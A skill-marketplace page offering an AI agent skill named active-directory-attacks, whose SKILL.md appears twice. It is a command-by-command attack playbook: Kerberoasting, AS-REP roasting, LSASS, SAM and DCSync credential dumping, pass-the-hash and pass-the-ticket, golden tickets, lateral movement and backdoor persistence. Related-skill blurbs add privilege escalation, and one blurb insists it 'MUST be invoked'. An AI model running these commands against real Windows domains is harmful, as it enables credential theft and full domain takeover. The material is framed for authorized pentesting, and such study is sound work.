Adoption

Agent Skills are supported by leading AI development tools.

VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory

0X6C7879/active-directory-attacks

Name: active-directory-attacks
Author: 0X6C7879

skills/active-directory-attacks/SKILL.md

npx skillsauth add 0X6C7879/aegissec active-directory-attacks

Clean

TrivyContainer and dependency vulnerability scanner

Clean

SemgrepStatic code analysis for vulnerabilities

Clean

mcp-scan (Snyk)Model Context Protocol security validation

Skipped

Snyk (dep)Open source security scanning

Skipped

Socket.devSupply chain security analysis

Skipped

VirusTotalMulti-engine malware detection

Skipped

CrowdStrikeAdvanced threat intelligence

Skipped

OSV-ScannerOpen Source Vulnerability database check

Skipped

OWASP Dep-Check

Attacking Active Directory

When to Use

AD reconnaissance and enumeration
Kerberos-based attacks
Credential dumping from domain controllers
Lateral movement within domains
BloodHound attack path analysis
Domain persistence techniques

Kerberoasting

Windows:

# Check kerberoastable users
.\Rubeus.exe kerberoast /stats

# Roast all
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target specific user
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt

# Target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap

Linux:

# Impacket GetUserSPNs
GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user:password -outputfile hashes.txt

# With NT hash
GetUserSPNs.py -request -dc-ip 10.10.10.10 -hashes :ntlmhash domain.local/user -outputfile hashes.txt

# Target specific user
GetUserSPNs.py -request-user svc_mssql -dc-ip 10.10.10.10 domain.local/user:password

Crack Hashes:

# Hashcat (TGS-REP)
hashcat -m 13100 hashes.txt wordlist.txt

# John
john --wordlist=wordlist.txt hashes.txt

ASREPRoasting

Windows:

# Enumerate vulnerable users
Get-DomainUser -PreauthNotRequired

# Roast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
.\Rubeus.exe asreproast /user:victim /format:hashcat

Linux:

# With domain creds
GetNPUsers.py domain.local/user:password -request -format hashcat -outputfile hashes.txt

# Without creds (username list)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.10

Crack AS-REP:

hashcat -m 18200 hashes.txt wordlist.txt

BloodHound

Data Collection:

# Windows - SharpHound
.\SharpHound.exe -c All --zipfilename output.zip
.\SharpHound.exe -c All,GPOLocalGroup

Linux:

# bloodhound-python
bloodhound-python -u user -p password -ns 10.10.10.10 -d domain.local -c All --zip

Useful Queries:

# Shortest path to Domain Admins
MATCH p=shortestPath((n)-[*1..]->(m:Group {name:'DOMAIN [email protected]'})) RETURN p

# Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u

# AS-REP Roastable
MATCH (u:User {dontreqpreauth:true}) RETURN u

# Unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

# DCSync rights
MATCH p=(n)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p

Credential Dumping

LSASS Dumping:

# Task Manager: Right-click lsass.exe -> Create dump file

# procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full

# Parse offline with mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

SAM Dumping:

# Save hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

# Extract hashes (Linux)
secretsdump.py -sam sam.hive -system system.hive LOCAL

DCSync (Domain):

# secretsdump - dump all
secretsdump.py domain.local/user:[email protected] -just-dc

# Specific user
secretsdump.py domain.local/user:[email protected] -just-dc-user krbtgt

# With NTLM hash
secretsdump.py -hashes :ntlmhash domain.local/[email protected] -just-dc

Pass-the-Hash

Windows:

# Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe

Linux:

# CrackMapExec
crackmapexec smb 10.10.10.10 -u administrator -H hash
crackmapexec smb 10.10.10.10 -u administrator -H hash -x whoami

# psexec
psexec.py -hashes :hash [email protected]

# wmiexec
wmiexec.py -hashes :hash [email protected]

# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -H hash

Pass-the-Ticket

Export Tickets:

# Mimikatz
sekurlsa::tickets /export

# Rubeus
.\Rubeus.exe dump /nowrap
.\Rubeus.exe monitor /interval:10

Import/Use Tickets:

# Mimikatz
kerberos::ptt ticket.kirbi

# Rubeus
.\Rubeus.exe ptt /ticket:base64ticket

# Verify
klist

Linux PtT:

# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache

# Set ticket
export KRB5CCNAME=ticket.ccache

# Use ticket
psexec.py -k -no-pass domain.local/[email protected]

Overpass-the-Hash

# Rubeus - request TGT with NTLM hash
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /rc4:hash /ptt

# With AES key (better OPSEC)
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /aes256:key /ptt

Golden/Silver Tickets

Golden Ticket (TGT):

# Requirements: krbtgt hash, Domain SID

# Mimikatz
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt

# Rubeus
.\Rubeus.exe golden /rc4:hash /user:administrator /domain:domain.local /sid:S-1-5-21-... /ptt

Silver Ticket (TGS):

# Requirements: Service account hash, Service SPN

# Mimikatz - CIFS service
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /target:dc.domain.local /service:cifs /rc4:hash /ptt

Lateral Movement

CrackMapExec:

# SMB spray
crackmapexec smb 10.10.10.0/24 -u user -p password

# Execute commands
crackmapexec smb 10.10.10.10 -u admin -p password -x whoami
crackmapexec smb 10.10.10.10 -u admin -H hash -x whoami

# Dump SAM
crackmapexec smb 10.10.10.10 -u admin -p password --sam

# Dump LSA
crackmapexec smb 10.10.10.10 -u admin -p password --lsa

PSExec Variants:

# psexec
psexec.py domain/user:[email protected]

# wmiexec (stealthier)
wmiexec.py domain/user:[email protected]

# smbexec (no service)
smbexec.py domain/user:[email protected]

WinRM:

# PowerShell
Enter-PSSession -ComputerName dc.domain.local -Credential domain\user

# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -p password
evil-winrm -i 10.10.10.10 -u administrator -H hash

Enumeration

Domain Info:

# PowerView
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainComputer
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"

Linux Enumeration:

# crackmapexec
crackmapexec smb 10.10.10.0/24 -u user -p password --users
crackmapexec smb 10.10.10.0/24 -u user -p password --groups

# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -D '[email protected]' -w 'password' -b "DC=domain,DC=local"

Quick Workflow

Initial Access → Get domain credentials
Enumeration → Run BloodHound collection
Kerberoasting → Extract and crack service tickets
Lateral Movement → Use creds to move to high-value targets
Credential Dumping → Dump LSASS/SAM on compromised hosts
DCSync → Extract all domain hashes from DC
Persistence → Golden ticket or create backdoor accounts

Common Wins

Kerberoasting weak service account passwords
ASREPRoasting accounts without preauth
BloodHound finding short paths to DA
Pass-the-Hash from dumped credentials
DCSync with compromised accounts that have replication rights

Tools

Rubeus - Kerberos attacks (Windows)
Mimikatz - Credential dumping (Windows)
Impacket - Comprehensive toolkit (Linux)
BloodHound - AD relationship graphing
CrackMapExec - Swiss army knife for AD
PowerView - AD enumeration (PowerShell)
evil-winrm - WinRM access (Linux)

References

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
https://github.com/fortra/impacket
https://github.com/GhostPack/Rubeus
https://github.com/BloodHoundAD/BloodHound

0X6C7879/active-directory-attacks

skills/active-directory-attacks/SKILL.md

Attack and enumerate Active Directory environments using Kerberos attacks (Kerberoasting, ASREPRoasting), credential dumping (DCSync, Mimikatz), lateral movement (PtH, PtT), and BloodHound analysis. Use when pentesting Windows domains or exploiting AD misconfigurations.

1 stars

testing

Updated Apr 21, 2026

$ install --global

skillsauth

npx skillsauth add 0X6C7879/aegissec active-directory-attacks

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

Security Scan Results

3 of 9 scanners reported clean

Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

Scanners Passed

Scanners in report

Clean

TrivyContainer and dependency vulnerability scanner

95%

Clean

SemgrepStatic code analysis for vulnerabilities

95%

Clean

mcp-scan (Snyk)Model Context Protocol security validation

95%

Skipped

Snyk (dep)Open source security scanning

50%

Skipped

Socket.devSupply chain security analysis

50%

Skipped

VirusTotalMulti-engine malware detection

50%

Skipped

CrowdStrikeAdvanced threat intelligence

50%

Skipped

OSV-ScannerOpen Source Vulnerability database check

50%

Skipped

OWASP Dep-Check

50%

Last scanned: Apr 22, 2026, 4:39 AM127.1s1 file scanned

SKILL.md

name:: active-directory-attacks
description:: Attack and enumerate Active Directory environments using Kerberos attacks (Kerberoasting, ASREPRoasting), credential dumping (DCSync, Mimikatz), lateral movement (PtH, PtT), and BloodHound analysis. Use when pentesting Windows domains or exploiting AD misconfigurations.

Attacking Active Directory

When to Use

AD reconnaissance and enumeration
Kerberos-based attacks
Credential dumping from domain controllers
Lateral movement within domains
BloodHound attack path analysis
Domain persistence techniques

Kerberoasting

Windows:

# Check kerberoastable users
.\Rubeus.exe kerberoast /stats

# Roast all
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target specific user
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt

# Target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap

Linux:

# Impacket GetUserSPNs
GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user:password -outputfile hashes.txt

# With NT hash
GetUserSPNs.py -request -dc-ip 10.10.10.10 -hashes :ntlmhash domain.local/user -outputfile hashes.txt

# Target specific user
GetUserSPNs.py -request-user svc_mssql -dc-ip 10.10.10.10 domain.local/user:password

Crack Hashes:

# Hashcat (TGS-REP)
hashcat -m 13100 hashes.txt wordlist.txt

# John
john --wordlist=wordlist.txt hashes.txt

ASREPRoasting

Windows:

# Enumerate vulnerable users
Get-DomainUser -PreauthNotRequired

# Roast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
.\Rubeus.exe asreproast /user:victim /format:hashcat

Linux:

# With domain creds
GetNPUsers.py domain.local/user:password -request -format hashcat -outputfile hashes.txt

# Without creds (username list)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.10

Crack AS-REP:

hashcat -m 18200 hashes.txt wordlist.txt

BloodHound

Data Collection:

# Windows - SharpHound
.\SharpHound.exe -c All --zipfilename output.zip
.\SharpHound.exe -c All,GPOLocalGroup

Linux:

# bloodhound-python
bloodhound-python -u user -p password -ns 10.10.10.10 -d domain.local -c All --zip

Useful Queries:

# Shortest path to Domain Admins
MATCH p=shortestPath((n)-[*1..]->(m:Group {name:'DOMAIN [email protected]'})) RETURN p

# Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u

# AS-REP Roastable
MATCH (u:User {dontreqpreauth:true}) RETURN u

# Unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

# DCSync rights
MATCH p=(n)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p

Credential Dumping

LSASS Dumping:

# Task Manager: Right-click lsass.exe -> Create dump file

# procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full

# Parse offline with mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

SAM Dumping:

# Save hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

# Extract hashes (Linux)
secretsdump.py -sam sam.hive -system system.hive LOCAL

DCSync (Domain):

# secretsdump - dump all
secretsdump.py domain.local/user:[email protected] -just-dc

# Specific user
secretsdump.py domain.local/user:[email protected] -just-dc-user krbtgt

# With NTLM hash
secretsdump.py -hashes :ntlmhash domain.local/[email protected] -just-dc

Pass-the-Hash

Windows:

# Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe

Linux:

# CrackMapExec
crackmapexec smb 10.10.10.10 -u administrator -H hash
crackmapexec smb 10.10.10.10 -u administrator -H hash -x whoami

# psexec
psexec.py -hashes :hash [email protected]

# wmiexec
wmiexec.py -hashes :hash [email protected]

# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -H hash

Pass-the-Ticket

Export Tickets:

# Mimikatz
sekurlsa::tickets /export

# Rubeus
.\Rubeus.exe dump /nowrap
.\Rubeus.exe monitor /interval:10

Import/Use Tickets:

# Mimikatz
kerberos::ptt ticket.kirbi

# Rubeus
.\Rubeus.exe ptt /ticket:base64ticket

# Verify
klist

Linux PtT:

# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache

# Set ticket
export KRB5CCNAME=ticket.ccache

# Use ticket
psexec.py -k -no-pass domain.local/[email protected]

Overpass-the-Hash

# Rubeus - request TGT with NTLM hash
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /rc4:hash /ptt

# With AES key (better OPSEC)
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /aes256:key /ptt

Golden/Silver Tickets

Golden Ticket (TGT):

# Requirements: krbtgt hash, Domain SID

# Mimikatz
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt

# Rubeus
.\Rubeus.exe golden /rc4:hash /user:administrator /domain:domain.local /sid:S-1-5-21-... /ptt

Silver Ticket (TGS):

# Requirements: Service account hash, Service SPN

# Mimikatz - CIFS service
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /target:dc.domain.local /service:cifs /rc4:hash /ptt

Lateral Movement

CrackMapExec:

# SMB spray
crackmapexec smb 10.10.10.0/24 -u user -p password

# Execute commands
crackmapexec smb 10.10.10.10 -u admin -p password -x whoami
crackmapexec smb 10.10.10.10 -u admin -H hash -x whoami

# Dump SAM
crackmapexec smb 10.10.10.10 -u admin -p password --sam

# Dump LSA
crackmapexec smb 10.10.10.10 -u admin -p password --lsa

PSExec Variants:

# psexec
psexec.py domain/user:[email protected]

# wmiexec (stealthier)
wmiexec.py domain/user:[email protected]

# smbexec (no service)
smbexec.py domain/user:[email protected]

WinRM:

# PowerShell
Enter-PSSession -ComputerName dc.domain.local -Credential domain\user

# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -p password
evil-winrm -i 10.10.10.10 -u administrator -H hash

Enumeration

Domain Info:

# PowerView
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainComputer
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"

Linux Enumeration:

# crackmapexec
crackmapexec smb 10.10.10.0/24 -u user -p password --users
crackmapexec smb 10.10.10.0/24 -u user -p password --groups

# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -D '[email protected]' -w 'password' -b "DC=domain,DC=local"

Quick Workflow

Initial Access → Get domain credentials
Enumeration → Run BloodHound collection
Kerberoasting → Extract and crack service tickets
Lateral Movement → Use creds to move to high-value targets
Credential Dumping → Dump LSASS/SAM on compromised hosts
DCSync → Extract all domain hashes from DC
Persistence → Golden ticket or create backdoor accounts

Common Wins

Kerberoasting weak service account passwords
ASREPRoasting accounts without preauth
BloodHound finding short paths to DA
Pass-the-Hash from dumped credentials
DCSync with compromised accounts that have replication rights

Tools

Rubeus - Kerberos attacks (Windows)
Mimikatz - Credential dumping (Windows)
Impacket - Comprehensive toolkit (Linux)
BloodHound - AD relationship graphing
CrackMapExec - Swiss army knife for AD
PowerView - AD enumeration (PowerShell)
evil-winrm - WinRM access (Linux)

References

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
https://github.com/fortra/impacket
https://github.com/GhostPack/Rubeus
https://github.com/BloodHoundAD/BloodHound

Related Skills

0X6C7879/wooyun-legacy

development

VerifiedTrustedCommunity

WooYun-derived business-logic testing methodology for web apps and APIs. Use when the request involves 支付、退款、订单、越权、认证、授权、价格篡改或业务流程绕过 review, especially black-box probing for price tampering, account takeover, and process bypass flaws.

2SKILL.mdUpdated Apr 28, 2026

0X6C7879/wooyun-legacy

0X6C7879/windows-privilege-escalation

tools

VerifiedTrustedCommunity

Escalate privileges on Windows systems using service misconfigurations, DLL hijacking, token manipulation, UAC bypasses, registry exploits, and credential dumping. Use when performing Windows post-exploitation or privilege escalation.

2SKILL.mdUpdated Apr 28, 2026

0X6C7879/windows-privilege-escalation

0X6C7879/tunnel

development

VerifiedTrustedCommunity

Use when performing AD pentest tunneling and pivoting, especially with Ligolo-ng, Chisel, frp, proxychains, SSH forwarding, SOCKS relays, reverse tunnels, or when internal reachability is the main blocker.

2SKILL.mdUpdated Apr 28, 2026

0X6C7879/threat-modeling

development

VerifiedTrustedCommunity

Threat model, security audit, find vulnerabilities, check security of my app, risk assessment, penetration test prep, analyze attack surface, what could an attacker exploit. Use this skill whenever a user wants holistic security analysis of a codebase, application, or project. MUST be invoked instead of analyzing security yourself — it runs a specialized 8-phase STRIDE workflow producing professional deliverables you cannot generate alone: risk assessment reports, DFD diagrams, threat inventories, attack path validation, mitigation plans, and pentest plans. Trigger on: 威胁建模, 安全评估, 渗透测试, 安全分析, 安全审计, 安全检查, 风险评估. NOT for: fixing one specific bug, adding one security feature (rate limiting, CORS), writing tests, CI/CD setup, or debugging errors.

2SKILL.mdUpdated Apr 22, 2026

0X6C7879/threat-modeling

Download

For Claude Desktop. Download once, then upload the file in the app — no terminal needed.

Need help? View full Cowork setup guide →

Install manually

Choose your platform

# Clone the repo
git clone https://github.com/0X6C7879/aegissec.git

# Copy into Claude Code skills folder (global)
cp -r aegissec/skills/active-directory-attacks ~/.claude/skills/

Claude Code Skills — official skills path docs.

Repository

0X6C7879/aegissec

1 stars

Compatible with

Claude Code

OpenAI Codex CLI

ChatGPT